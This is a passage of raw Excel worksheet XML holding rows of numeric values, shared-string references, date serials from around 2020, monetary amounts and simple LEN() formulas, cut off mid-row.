    <row r="433" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A433">
        <v>20368</v>
      </c>
      <c r="B433">
        <v>509</v>
      </c>
      <c r="C433" t="s">
        <v>932</v>
      </c>
      <c r="D433" t="s">
        <v>10653</v>
      </c>
      <c r="E433">
        <v>26</v>
      </c>
      <c r="F433" t="s">
        <v>10660</v>
      </c>
      <c r="G433" s="1">
        <v>43906</v>
      </c>
      <c r="H433">
        <v>15000</v>
      </c>
      <c r="I433" t="s">
        <v>9693</v>
      </c>
      <c r="J433" t="s">
        <v>10655</v>
      </c>
      <c r="K433">
        <f>LEN(I433)</f>
        <v>33</v>
      </c>
      <c r="L433">
        <f>LEN(J433)</f>
        <v>45</v>
      </c>
    </row>
    <row r="434" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A434">
        <v>20325</v>
      </c>
      <c r="B434">
        <v>683</v>
      </c>
      <c r="C434" t="s">
        <v>46</v>
      </c>
      <c r="D434" t="s">
        <v>10626</v>
      </c>
      <c r="E434">
        <v>2</v>
      </c>
      <c r="F434" t="s">
        <v>9466</v>
      </c>
      <c r="G434" s="1">
        <v>43942</v>
      </c>
      <c r="H434">
        <v>2000</v>
      </c>
      <c r="I434" t="s">
        <v>9952</v>
      </c>
      <c r="J434" t="s">
        <v>10628</v>
      </c>
      <c r="K434">
        <f>LEN(I434)</f>
        <v>18</v>
      </c>
      <c r="L434">
        <f>LEN(J434)</f>
        <v>45</v>
      </c>
    </row>
    <row r="435" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A435">
        <v>21362</v>
      </c>
      <c r="B435">
        <v>427</v>
      </c>
      <c r="C435" t="s">
        <v>1619</v>
      </c>
      <c r="D435" t="s">
        <v>11325</v>
      </c>
      <c r="E435">
        <v>12</v>
      </c>
      <c r="F435" t="s">
        <v>11332</v>
      </c>
      <c r="G435" s="1">
        <v>44116</v>
      </c>
      <c r="H435">
        <v>10000</v>
      </c>
      <c r="I435" t="s">
        <v>9550</v>
      </c>
      <c r="J435" t="s">
        <v>10328</v>
      </c>
      <c r="K435">
        <f>LEN(I435)</f>
        <v>18</v>
      </c>
      <c r="L435">
        <f>LEN(J435)</f>
        <v>45</v>
      </c>
    </row>
    <row r="436" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A436">
        <v>16700</v>
      </c>
      <c r="B436">
        <v>837</v>
      </c>
      <c r="C436" t="s">
        <v>1859</v>
      </c>
      <c r="D436" t="s">
        <v>9479</v>
      </c>
      <c r="E436">
        <v>13</v>
      </c>
      <c r="F436" t="s">
        <v>9480</v>
      </c>
      <c r="G436" s="1">
        <v>43923</v>
      </c>
      <c r="H436">
        <v>12000</v>
      </c>
      <c r="J436" t="s">
        <v>9481</v>
      </c>
      <c r="K436">
        <f>LEN(I436)</f>
        <v>0</v>
      </c>
      <c r="L436">
        <f>LEN(J436)</f>
        <v>45</v>
      </c>
    </row>
    <row r="437" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A437">
        <v>19798</v>
      </c>
      <c r="B437">
        <v>226</v>
      </c>
      <c r="C437" t="s">
        <v>502</v>
      </c>
      <c r="D437" t="s">
        <v>10242</v>
      </c>
      <c r="E437">
        <v>16</v>
      </c>
      <c r="F437" t="s">
        <v>10245</v>
      </c>
      <c r="G437" s="1">
        <v>43922</v>
      </c>
      <c r="H437">
        <v>1459169</v>
      </c>
      <c r="J437" t="s">
        <v>10246</v>
      </c>
      <c r="K437">
        <f>LEN(I437)</f>
        <v>0</v>
      </c>
      <c r="L437">
        <f>LEN(J437)</f>
        <v>45</v>
      </c>
    </row>
    <row r="438" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A438">
        <v>19799</v>
      </c>
      <c r="B438">
        <v>226</v>
      </c>
      <c r="C438" t="s">
        <v>502</v>
      </c>
      <c r="D438" t="s">
        <v>10242</v>
      </c>
      <c r="E438">
        <v>16</v>
      </c>
      <c r="F438" t="s">
        <v>10247</v>
      </c>
      <c r="G438" s="1">
        <v>43922</v>
      </c>
      <c r="H438">
        <v>395903</v>
      </c>
      <c r="J438" t="s">
        <v>10246</v>
      </c>
      <c r="K438">
        <f>LEN(I438)</f>
        <v>0</v>
      </c>
      <c r="L438">
        <f>LEN(J438)</f>
        <v>45</v>
      </c>
    </row>
    <row r="439" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A439">
        <v>19912</v>
      </c>
      <c r="B439">
        <v>2249</v>
      </c>
      <c r="C439" t="s">
        <v>5498</v>
      </c>
      <c r="D439" t="s">
        <v>10327</v>
      </c>
      <c r="E439">
        <v>16</v>
      </c>
      <c r="F439" t="s">
        <v>7564</v>
      </c>
      <c r="G439" s="1">
        <v>43930</v>
      </c>
      <c r="H439">
        <v>300000</v>
      </c>
      <c r="J439" t="s">
        <v>10328</v>
      </c>
      <c r="K439">
        <f>LEN(I439)</f>
        <v>0</v>
      </c>
      <c r="L439">
        <f>LEN(J439)</f>
        <v>45</v>
      </c>
    </row>
    <row r="440" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A440">
        <v>19913</v>
      </c>
      <c r="B440">
        <v>2249</v>
      </c>
      <c r="C440" t="s">
        <v>5498</v>
      </c>
      <c r="D440" t="s">
        <v>10327</v>
      </c>
      <c r="E440">
        <v>16</v>
      </c>
      <c r="F440" t="s">
        <v>547</v>
      </c>
      <c r="G440" s="1">
        <v>43930</v>
      </c>
      <c r="H440">
        <v>300000</v>
      </c>
      <c r="J440" t="s">
        <v>10328</v>
      </c>
      <c r="K440">
        <f>LEN(I440)</f>
        <v>0</v>
      </c>
      <c r="L440">
        <f>LEN(J440)</f>
        <v>45</v>
      </c>
    </row>
    <row r="441" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A441">
        <v>19914</v>
      </c>
      <c r="B441">
        <v>2249</v>
      </c>
      <c r="C441" t="s">
        <v>5498</v>
      </c>
      <c r="D441" t="s">
        <v>10327</v>
      </c>
      <c r="E441">
        <v>16</v>
      </c>
      <c r="F441" t="s">
        <v>3204</v>
      </c>
      <c r="G441" s="1">
        <v>43930</v>
      </c>
      <c r="H441">
        <v>200000</v>
      </c>
      <c r="J441" t="s">
        <v>10328</v>
      </c>
      <c r="K441">
        <f>LEN(I441)</f>
        <v>0</v>
      </c>
      <c r="L441">
        <f>LEN(J441)</f>
        <v>45</v>
      </c>
    </row>
    <row r="442" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A442">
        <v>20540</v>
      </c>
      <c r="B442">
        <v>2718</v>
      </c>
      <c r="C442" t="s">
        <v>6936</v>
      </c>
      <c r="D442" t="s">
        <v>10784</v>
      </c>
      <c r="E442">
        <v>26</v>
      </c>
      <c r="F442" t="s">
        <v>10787</v>
      </c>
      <c r="G442" s="1">
        <v>43921</v>
      </c>
      <c r="H442">
        <v>500000</v>
      </c>
      <c r="J442" t="s">
        <v>10788</v>
      </c>
      <c r="K442">
        <f>LEN(I442)</f>
        <v>0</v>
      </c>
      <c r="L442">
        <f>LEN(J442)</f>
        <v>45</v>
      </c>
    </row>
    <row r="443" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A443">
        <v>21041</v>
      </c>
      <c r="B443">
        <v>1611</v>
      </c>
      <c r="C443" t="s">
        <v>2858</v>
      </c>
      <c r="D443" t="s">
        <v>11114</v>
      </c>
      <c r="E443">
        <v>16</v>
      </c>
      <c r="F443" t="s">
        <v>3499</v>
      </c>
      <c r="G443" s="1">
        <v>44008</v>
      </c>
      <c r="H443">
        <v>12000</v>
      </c>
      <c r="J443" t="s">
        <v>9481</v>
      </c>
      <c r="K443">
        <f>LEN(I443)</f>
        <v>0</v>
      </c>
      <c r="L443">
        <f>LEN(J443)</f>
        <v>45</v>
      </c>
    </row>
    <row r="444" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A444">
        <v>21225</v>
      </c>
      <c r="B444">
        <v>613</v>
      </c>
      <c r="C444" t="s">
        <v>361</v>
      </c>
      <c r="D444" t="s">
        <v>11219</v>
      </c>
      <c r="E444">
        <v>16</v>
      </c>
      <c r="F444" t="s">
        <v>364</v>
      </c>
      <c r="G444" s="1">
        <v>44013</v>
      </c>
      <c r="H444">
        <v>4800000</v>
      </c>
      <c r="J444" t="s">
        <v>10328</v>
      </c>
      <c r="K444">
        <f>LEN(I444)</f>
        <v>0</v>
      </c>
      <c r="L444">
        <f>LEN(J444)</f>
        <v>45</v>
      </c>
    </row>
    <row r="445" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A445">
        <v>21306</v>
      </c>
      <c r="B445">
        <v>879</v>
      </c>
      <c r="C445" t="s">
        <v>3202</v>
      </c>
      <c r="D445" t="s">
        <v>11284</v>
      </c>
      <c r="E445">
        <v>16</v>
      </c>
      <c r="F445" t="s">
        <v>3204</v>
      </c>
      <c r="G445" s="1">
        <v>44116</v>
      </c>
      <c r="H445">
        <v>25000</v>
      </c>
      <c r="J445" t="s">
        <v>10328</v>
      </c>
      <c r="K445">
        <f>LEN(I445)</f>
        <v>0</v>
      </c>
      <c r="L445">
        <f>LEN(J445)</f>
        <v>45</v>
      </c>
    </row>
    <row r="446" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A446">
        <v>21324</v>
      </c>
      <c r="B446">
        <v>4759</v>
      </c>
      <c r="C446" t="s">
        <v>7012</v>
      </c>
      <c r="D446" t="s">
        <v>11305</v>
      </c>
      <c r="E446">
        <v>16</v>
      </c>
      <c r="F446" t="s">
        <v>2236</v>
      </c>
      <c r="G446" s="1">
        <v>44048</v>
      </c>
      <c r="H446">
        <v>3400000</v>
      </c>
      <c r="J446" t="s">
        <v>11307</v>
      </c>
      <c r="K446">
        <f>LEN(I446)</f>
        <v>0</v>
      </c>
      <c r="L446">
        <f>LEN(J446)</f>
        <v>45</v>
      </c>
    </row>
    <row r="447" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A447">
        <v>20383</v>
      </c>
      <c r="B447">
        <v>532</v>
      </c>
      <c r="C447" t="s">
        <v>982</v>
      </c>
      <c r="D447" t="s">
        <v>10675</v>
      </c>
      <c r="E447">
        <v>12</v>
      </c>
      <c r="F447" t="s">
        <v>2236</v>
      </c>
      <c r="G447" s="1">
        <v>43949</v>
      </c>
      <c r="H447">
        <v>240000</v>
      </c>
      <c r="J447" t="s">
        <v>10676</v>
      </c>
      <c r="K447">
        <f>LEN(I447)</f>
        <v>0</v>
      </c>
      <c r="L447">
        <f>LEN(J447)</f>
        <v>44</v>
      </c>
    </row>
    <row r="448" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A448">
        <v>20688</v>
      </c>
      <c r="B448">
        <v>2772</v>
      </c>
      <c r="C448" t="s">
        <v>4132</v>
      </c>
      <c r="D448" t="s">
        <v>10886</v>
      </c>
      <c r="E448">
        <v>16</v>
      </c>
      <c r="F448" t="s">
        <v>2236</v>
      </c>
      <c r="G448" s="1">
        <v>43945</v>
      </c>
      <c r="H448">
        <v>720000</v>
      </c>
      <c r="I448" t="s">
        <v>10888</v>
      </c>
      <c r="J448" t="s">
        <v>10889</v>
      </c>
      <c r="K448">
        <f>LEN(I448)</f>
        <v>76</v>
      </c>
      <c r="L448">
        <f>LEN(J448)</f>
        <v>43</v>
      </c>
    </row>
    <row r="449" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A449">
        <v>20330</v>
      </c>
      <c r="B449">
        <v>2613</v>
      </c>
      <c r="C449" t="s">
        <v>5818</v>
      </c>
      <c r="D449" t="s">
        <v>10632</v>
      </c>
      <c r="E449">
        <v>11</v>
      </c>
      <c r="F449" t="s">
        <v>5820</v>
      </c>
      <c r="G449" s="1">
        <v>43959</v>
      </c>
      <c r="H449">
        <v>2000</v>
      </c>
      <c r="I449" t="s">
        <v>10633</v>
      </c>
      <c r="J449" t="s">
        <v>10634</v>
      </c>
      <c r="K449">
        <f>LEN(I449)</f>
        <v>56</v>
      </c>
      <c r="L449">
        <f>LEN(J449)</f>
        <v>43</v>
      </c>
    </row>
    <row r="450" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A450">
        <v>16889</v>
      </c>
      <c r="B450">
        <v>1381</v>
      </c>
      <c r="C450" t="s">
        <v>2504</v>
      </c>
      <c r="D450" t="s">
        <v>9549</v>
      </c>
      <c r="E450">
        <v>11</v>
      </c>
      <c r="F450" t="s">
        <v>7613</v>
      </c>
      <c r="G450" s="1">
        <v>43913</v>
      </c>
      <c r="H450">
        <v>2000</v>
      </c>
      <c r="I450" t="s">
        <v>9550</v>
      </c>
      <c r="J450" t="s">
        <v>9553</v>
      </c>
      <c r="K450">
        <f>LEN(I450)</f>
        <v>18</v>
      </c>
      <c r="L450">
        <f>LEN(J450)</f>
        <v>43</v>
      </c>
    </row>
    <row r="451" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A451">
        <v>16895</v>
      </c>
      <c r="B451">
        <v>1381</v>
      </c>
      <c r="C451" t="s">
        <v>2504</v>
      </c>
      <c r="D451" t="s">
        <v>9549</v>
      </c>
      <c r="E451">
        <v>11</v>
      </c>
      <c r="F451" t="s">
        <v>5434</v>
      </c>
      <c r="G451" s="1">
        <v>43913</v>
      </c>
      <c r="H451">
        <v>2000</v>
      </c>
      <c r="I451" t="s">
        <v>9550</v>
      </c>
      <c r="J451" t="s">
        <v>9553</v>
      </c>
      <c r="K451">
        <f>LEN(I451)</f>
        <v>18</v>
      </c>
      <c r="L451">
        <f>LEN(J451)</f>
        <v>43</v>
      </c>
    </row>
    <row r="452" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A452">
        <v>19814</v>
      </c>
      <c r="B452">
        <v>2390</v>
      </c>
      <c r="C452" t="s">
        <v>5376</v>
      </c>
      <c r="D452" t="s">
        <v>9821</v>
      </c>
      <c r="E452">
        <v>12</v>
      </c>
      <c r="F452" t="s">
        <v>764</v>
      </c>
      <c r="G452" s="1">
        <v>43873</v>
      </c>
      <c r="H452">
        <v>100000</v>
      </c>
      <c r="I452" t="s">
        <v>9550</v>
      </c>
      <c r="J452" t="s">
        <v>9553</v>
      </c>
      <c r="K452">
        <f>LEN(I452)</f>
        <v>18</v>
      </c>
      <c r="L452">
        <f>LEN(J452)</f>
        <v>43</v>
      </c>
    </row>
    <row r="453" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A453">
        <v>19660</v>
      </c>
      <c r="B453">
        <v>2550</v>
      </c>
      <c r="C453" t="s">
        <v>5066</v>
      </c>
      <c r="D453" t="s">
        <v>10161</v>
      </c>
      <c r="E453">
        <v>27</v>
      </c>
      <c r="F453" t="s">
        <v>10162</v>
      </c>
      <c r="G453" s="1">
        <v>43886</v>
      </c>
      <c r="H453">
        <v>80000</v>
      </c>
      <c r="J453" t="s">
        <v>10163</v>
      </c>
      <c r="K453">
        <f>LEN(I453)</f>
        <v>0</v>
      </c>
      <c r="L453">
        <f>LEN(J453)</f>
        <v>43</v>
      </c>
    </row>
    <row r="454" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A454">
        <v>19661</v>
      </c>
      <c r="B454">
        <v>2550</v>
      </c>
      <c r="C454" t="s">
        <v>5066</v>
      </c>
      <c r="D454" t="s">
        <v>10161</v>
      </c>
      <c r="E454">
        <v>27</v>
      </c>
      <c r="F454" t="s">
        <v>2236</v>
      </c>
      <c r="G454" s="1">
        <v>43886</v>
      </c>
      <c r="H454">
        <v>100000</v>
      </c>
      <c r="J454" t="s">
        <v>10163</v>
      </c>
      <c r="K454">
        <f>LEN(I454)</f>
        <v>0</v>
      </c>
      <c r="L454">
        <f>LEN(J454)</f>
        <v>43</v>
      </c>
    </row>
    <row r="455" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A455">
        <v>19666</v>
      </c>
      <c r="B455">
        <v>2550</v>
      </c>
      <c r="C455" t="s">
        <v>5066</v>
      </c>
      <c r="D455" t="s">
        <v>10161</v>
      </c>
      <c r="E455">
        <v>27</v>
      </c>
      <c r="F455" t="s">
        <v>9435</v>
      </c>
      <c r="G455" s="1">
        <v>43886</v>
      </c>
      <c r="H455">
        <v>40000</v>
      </c>
      <c r="J455" t="s">
        <v>10163</v>
      </c>
      <c r="K455">
        <f>LEN(I455)</f>
        <v>0</v>
      </c>
      <c r="L455">
        <f>LEN(J455)</f>
        <v>43</v>
      </c>
    </row>
    <row r="456" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A456">
        <v>19725</v>
      </c>
      <c r="B456">
        <v>634</v>
      </c>
      <c r="C456" t="s">
        <v>494</v>
      </c>
      <c r="D456" t="s">
        <v>10205</v>
      </c>
      <c r="E456">
        <v>2</v>
      </c>
      <c r="F456" t="s">
        <v>10206</v>
      </c>
      <c r="G456" s="1">
        <v>43914</v>
      </c>
      <c r="H456">
        <v>200000</v>
      </c>
      <c r="J456" t="s">
        <v>9553</v>
      </c>
      <c r="K456">
        <f>LEN(I456)</f>
        <v>0</v>
      </c>
      <c r="L456">
        <f>LEN(J456)</f>
        <v>43</v>
      </c>
    </row>
    <row r="457" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A457">
        <v>20257</v>
      </c>
      <c r="B457">
        <v>596</v>
      </c>
      <c r="C457" t="s">
        <v>835</v>
      </c>
      <c r="D457" t="s">
        <v>10583</v>
      </c>
      <c r="E457">
        <v>12</v>
      </c>
      <c r="F457" t="s">
        <v>10584</v>
      </c>
      <c r="G457" s="1">
        <v>43959</v>
      </c>
      <c r="H457">
        <v>50000</v>
      </c>
      <c r="J457" t="s">
        <v>10585</v>
      </c>
      <c r="K457">
        <f>LEN(I457)</f>
        <v>0</v>
      </c>
      <c r="L457">
        <f>LEN(J457)</f>
        <v>43</v>
      </c>
    </row>
    <row r="458" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A458">
        <v>20370</v>
      </c>
      <c r="B458">
        <v>2734</v>
      </c>
      <c r="C458" t="s">
        <v>6018</v>
      </c>
      <c r="D458" t="s">
        <v>10661</v>
      </c>
      <c r="E458">
        <v>14</v>
      </c>
      <c r="F458" t="s">
        <v>4686</v>
      </c>
      <c r="G458" s="1">
        <v>44048</v>
      </c>
      <c r="H458">
        <v>200</v>
      </c>
      <c r="J458" t="s">
        <v>10663</v>
      </c>
      <c r="K458">
        <f>LEN(I458)</f>
        <v>0</v>
      </c>
      <c r="L458">
        <f>LEN(J458)</f>
        <v>43</v>
      </c>
    </row>
    <row r="459" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A459">
        <v>20387</v>
      </c>
      <c r="B459">
        <v>532</v>
      </c>
      <c r="C459" t="s">
        <v>982</v>
      </c>
      <c r="D459" t="s">
        <v>10675</v>
      </c>
      <c r="E459">
        <v>12</v>
      </c>
      <c r="F459" t="s">
        <v>10682</v>
      </c>
      <c r="G459" s="1">
        <v>43949</v>
      </c>
      <c r="H459">
        <v>200000</v>
      </c>
      <c r="J459" t="s">
        <v>10683</v>
      </c>
      <c r="K459">
        <f>LEN(I459)</f>
        <v>0</v>
      </c>
      <c r="L459">
        <f>LEN(J459)</f>
        <v>43</v>
      </c>
    </row>
    <row r="460" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A460">
        <v>20775</v>
      </c>
      <c r="B460">
        <v>286</v>
      </c>
      <c r="C460" t="s">
        <v>1213</v>
      </c>
      <c r="D460" t="s">
        <v>10971</v>
      </c>
      <c r="E460">
        <v>16</v>
      </c>
      <c r="F460" t="s">
        <v>10972</v>
      </c>
      <c r="G460" s="1">
        <v>43987</v>
      </c>
      <c r="H460">
        <v>3000000</v>
      </c>
      <c r="J460" t="s">
        <v>10663</v>
      </c>
      <c r="K460">
        <f>LEN(I460)</f>
        <v>0</v>
      </c>
      <c r="L460">
        <f>LEN(J460)</f>
        <v>43</v>
      </c>
    </row>
    <row r="461" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A461">
        <v>20776</v>
      </c>
      <c r="B461">
        <v>286</v>
      </c>
      <c r="C461" t="s">
        <v>1213</v>
      </c>
      <c r="D461" t="s">
        <v>10971</v>
      </c>
      <c r="E461">
        <v>16</v>
      </c>
      <c r="F461" t="s">
        <v>9437</v>
      </c>
      <c r="G461" s="1">
        <v>43987</v>
      </c>
      <c r="H461">
        <v>250000</v>
      </c>
      <c r="J461" t="s">
        <v>10663</v>
      </c>
      <c r="K461">
        <f>LEN(I461)</f>
        <v>0</v>
      </c>
      <c r="L461">
        <f>LEN(J461)</f>
        <v>43</v>
      </c>
    </row>
    <row r="462" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A462">
        <v>20777</v>
      </c>
      <c r="B462">
        <v>286</v>
      </c>
      <c r="C462" t="s">
        <v>1213</v>
      </c>
      <c r="D462" t="s">
        <v>10971</v>
      </c>
      <c r="E462">
        <v>16</v>
      </c>
      <c r="F462" t="s">
        <v>3076</v>
      </c>
      <c r="G462" s="1">
        <v>43987</v>
      </c>
      <c r="H462">
        <v>3000000</v>
      </c>
      <c r="J462" t="s">
        <v>10663</v>
      </c>
      <c r="K462">
        <f>LEN(I462)</f>
        <v>0</v>
      </c>
      <c r="L462">
        <f>LEN(J462)</f>
        <v>43</v>
      </c>
    </row>
    <row r="463" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A463">
        <v>20998</v>
      </c>
      <c r="B463">
        <v>1381</v>
      </c>
      <c r="C463" t="s">
        <v>2504</v>
      </c>
      <c r="D463" t="s">
        <v>9549</v>
      </c>
      <c r="E463">
        <v>11</v>
      </c>
      <c r="F463" t="s">
        <v>11094</v>
      </c>
      <c r="G463" s="1">
        <v>44014</v>
      </c>
      <c r="H463">
        <v>500</v>
      </c>
      <c r="J463" t="s">
        <v>9553</v>
      </c>
      <c r="K463">
        <f>LEN(I463)</f>
        <v>0</v>
      </c>
      <c r="L463">
        <f>LEN(J463)</f>
        <v>43</v>
      </c>
    </row>
    <row r="464" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A464">
        <v>21000</v>
      </c>
      <c r="B464">
        <v>1381</v>
      </c>
      <c r="C464" t="s">
        <v>2504</v>
      </c>
      <c r="D464" t="s">
        <v>9549</v>
      </c>
      <c r="E464">
        <v>11</v>
      </c>
      <c r="F464" t="s">
        <v>9527</v>
      </c>
      <c r="G464" s="1">
        <v>44014</v>
      </c>
      <c r="H464">
        <v>500</v>
      </c>
      <c r="J464" t="s">
        <v>9553</v>
      </c>
      <c r="K464">
        <f>LEN(I464)</f>
        <v>0</v>
      </c>
      <c r="L464">
        <f>LEN(J464)</f>
        <v>43</v>
      </c>
    </row>
    <row r="465" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A465">
        <v>21002</v>
      </c>
      <c r="B465">
        <v>1381</v>
      </c>
      <c r="C465" t="s">
        <v>2504</v>
      </c>
      <c r="D465" t="s">
        <v>9549</v>
      </c>
      <c r="E465">
        <v>11</v>
      </c>
      <c r="F465" t="s">
        <v>11096</v>
      </c>
      <c r="G465" s="1">
        <v>44014</v>
      </c>
      <c r="H465">
        <v>500</v>
      </c>
      <c r="J465" t="s">
        <v>9553</v>
      </c>
      <c r="K465">
        <f>LEN(I465)</f>
        <v>0</v>
      </c>
      <c r="L465">
        <f>LEN(J465)</f>
        <v>43</v>
      </c>
    </row>
    <row r="466" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A466">
        <v>21003</v>
      </c>
      <c r="B466">
        <v>1381</v>
      </c>
      <c r="C466" t="s">
        <v>2504</v>
      </c>
      <c r="D466" t="s">
        <v>9549</v>
      </c>
      <c r="E466">
        <v>11</v>
      </c>
      <c r="F466" t="s">
        <v>3499</v>
      </c>
      <c r="G466" s="1">
        <v>44014</v>
      </c>
      <c r="H466">
        <v>500</v>
      </c>
      <c r="J466" t="s">
        <v>9553</v>
      </c>
      <c r="K466">
        <f>LEN(I466)</f>
        <v>0</v>
      </c>
      <c r="L466">
        <f>LEN(J466)</f>
        <v>43</v>
      </c>
    </row>
    <row r="467" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A467">
        <v>21005</v>
      </c>
      <c r="B467">
        <v>1381</v>
      </c>
      <c r="C467" t="s">
        <v>2504</v>
      </c>
      <c r="D467" t="s">
        <v>9549</v>
      </c>
      <c r="E467">
        <v>11</v>
      </c>
      <c r="F467" t="s">
        <v>3204</v>
      </c>
      <c r="G467" s="1">
        <v>44014</v>
      </c>
      <c r="H467">
        <v>500</v>
      </c>
      <c r="J467" t="s">
        <v>9553</v>
      </c>
      <c r="K467">
        <f>LEN(I467)</f>
        <v>0</v>
      </c>
      <c r="L467">
        <f>LEN(J467)</f>
        <v>43</v>
      </c>
    </row>
    <row r="468" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A468">
        <v>21066</v>
      </c>
      <c r="B468">
        <v>368</v>
      </c>
      <c r="C468" t="s">
        <v>1436</v>
      </c>
      <c r="D468" t="s">
        <v>9671</v>
      </c>
      <c r="E468">
        <v>14</v>
      </c>
      <c r="F468" t="s">
        <v>9437</v>
      </c>
      <c r="G468" s="1">
        <v>44039</v>
      </c>
      <c r="H468">
        <v>0</v>
      </c>
      <c r="J468" t="s">
        <v>10634</v>
      </c>
      <c r="K468">
        <f>LEN(I468)</f>
        <v>0</v>
      </c>
      <c r="L468">
        <f>LEN(J468)</f>
        <v>43</v>
      </c>
    </row>
    <row r="469" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A469">
        <v>21067</v>
      </c>
      <c r="B469">
        <v>368</v>
      </c>
      <c r="C469" t="s">
        <v>1436</v>
      </c>
      <c r="D469" t="s">
        <v>9671</v>
      </c>
      <c r="E469">
        <v>14</v>
      </c>
      <c r="F469" t="s">
        <v>9941</v>
      </c>
      <c r="G469" s="1">
        <v>44039</v>
      </c>
      <c r="H469">
        <v>0</v>
      </c>
      <c r="J469" t="s">
        <v>10634</v>
      </c>
      <c r="K469">
        <f>LEN(I469)</f>
        <v>0</v>
      </c>
      <c r="L469">
        <f>LEN(J469)</f>
        <v>43</v>
      </c>
    </row>
    <row r="470" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A470">
        <v>21068</v>
      </c>
      <c r="B470">
        <v>368</v>
      </c>
      <c r="C470" t="s">
        <v>1436</v>
      </c>
      <c r="D470" t="s">
        <v>9671</v>
      </c>
      <c r="E470">
        <v>14</v>
      </c>
      <c r="F470" t="s">
        <v>11122</v>
      </c>
      <c r="G470" s="1">
        <v>44039</v>
      </c>
      <c r="H470">
        <v>0</v>
      </c>
      <c r="J470" t="s">
        <v>10634</v>
      </c>
      <c r="K470">
        <f>LEN(I470)</f>
        <v>0</v>
      </c>
      <c r="L470">
        <f>LEN(J470)</f>
        <v>43</v>
      </c>
    </row>
    <row r="471" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A471">
        <v>21069</v>
      </c>
      <c r="B471">
        <v>368</v>
      </c>
      <c r="C471" t="s">
        <v>1436</v>
      </c>
      <c r="D471" t="s">
        <v>9671</v>
      </c>
      <c r="E471">
        <v>14</v>
      </c>
      <c r="F471" t="s">
        <v>1746</v>
      </c>
      <c r="G471" s="1">
        <v>44039</v>
      </c>
      <c r="H471">
        <v>0</v>
      </c>
      <c r="J471" t="s">
        <v>10634</v>
      </c>
      <c r="K471">
        <f>LEN(I471)</f>
        <v>0</v>
      </c>
      <c r="L471">
        <f>LEN(J471)</f>
        <v>43</v>
      </c>
    </row>
    <row r="472" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A472">
        <v>21070</v>
      </c>
      <c r="B472">
        <v>368</v>
      </c>
      <c r="C472" t="s">
        <v>1436</v>
      </c>
      <c r="D472" t="s">
        <v>9671</v>
      </c>
      <c r="E472">
        <v>14</v>
      </c>
      <c r="F472" t="s">
        <v>9722</v>
      </c>
      <c r="G472" s="1">
        <v>44039</v>
      </c>
      <c r="H472">
        <v>0</v>
      </c>
      <c r="J472" t="s">
        <v>10634</v>
      </c>
      <c r="K472">
        <f>LEN(I472)</f>
        <v>0</v>
      </c>
      <c r="L472">
        <f>LEN(J472)</f>
        <v>43</v>
      </c>
    </row>
    <row r="473" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A473">
        <v>21071</v>
      </c>
      <c r="B473">
        <v>368</v>
      </c>
      <c r="C473" t="s">
        <v>1436</v>
      </c>
      <c r="D473" t="s">
        <v>9671</v>
      </c>
      <c r="E473">
        <v>14</v>
      </c>
      <c r="F473" t="s">
        <v>9595</v>
      </c>
      <c r="G473" s="1">
        <v>44039</v>
      </c>
      <c r="H473">
        <v>0</v>
      </c>
      <c r="J473" t="s">
        <v>10634</v>
      </c>
      <c r="K473">
        <f>LEN(I473)</f>
        <v>0</v>
      </c>
      <c r="L473">
        <f>LEN(J473)</f>
        <v>43</v>
      </c>
    </row>
    <row r="474" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A474">
        <v>21072</v>
      </c>
      <c r="B474">
        <v>368</v>
      </c>
      <c r="C474" t="s">
        <v>1436</v>
      </c>
      <c r="D474" t="s">
        <v>9671</v>
      </c>
      <c r="E474">
        <v>14</v>
      </c>
      <c r="F474" t="s">
        <v>2236</v>
      </c>
      <c r="G474" s="1">
        <v>44039</v>
      </c>
      <c r="H474">
        <v>0</v>
      </c>
      <c r="J474" t="s">
        <v>10634</v>
      </c>
      <c r="K474">
        <f>LEN(I474)</f>
        <v>0</v>
      </c>
      <c r="L474">
        <f>LEN(J474)</f>
        <v>43</v>
      </c>
    </row>
    <row r="475" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A475">
        <v>21073</v>
      </c>
      <c r="B475">
        <v>368</v>
      </c>
      <c r="C475" t="s">
        <v>1436</v>
      </c>
      <c r="D475" t="s">
        <v>9671</v>
      </c>
      <c r="E475">
        <v>14</v>
      </c>
      <c r="F475" t="s">
        <v>11123</v>
      </c>
      <c r="G475" s="1">
        <v>44039</v>
      </c>
      <c r="H475">
        <v>0</v>
      </c>
      <c r="J475" t="s">
        <v>10634</v>
      </c>
      <c r="K475">
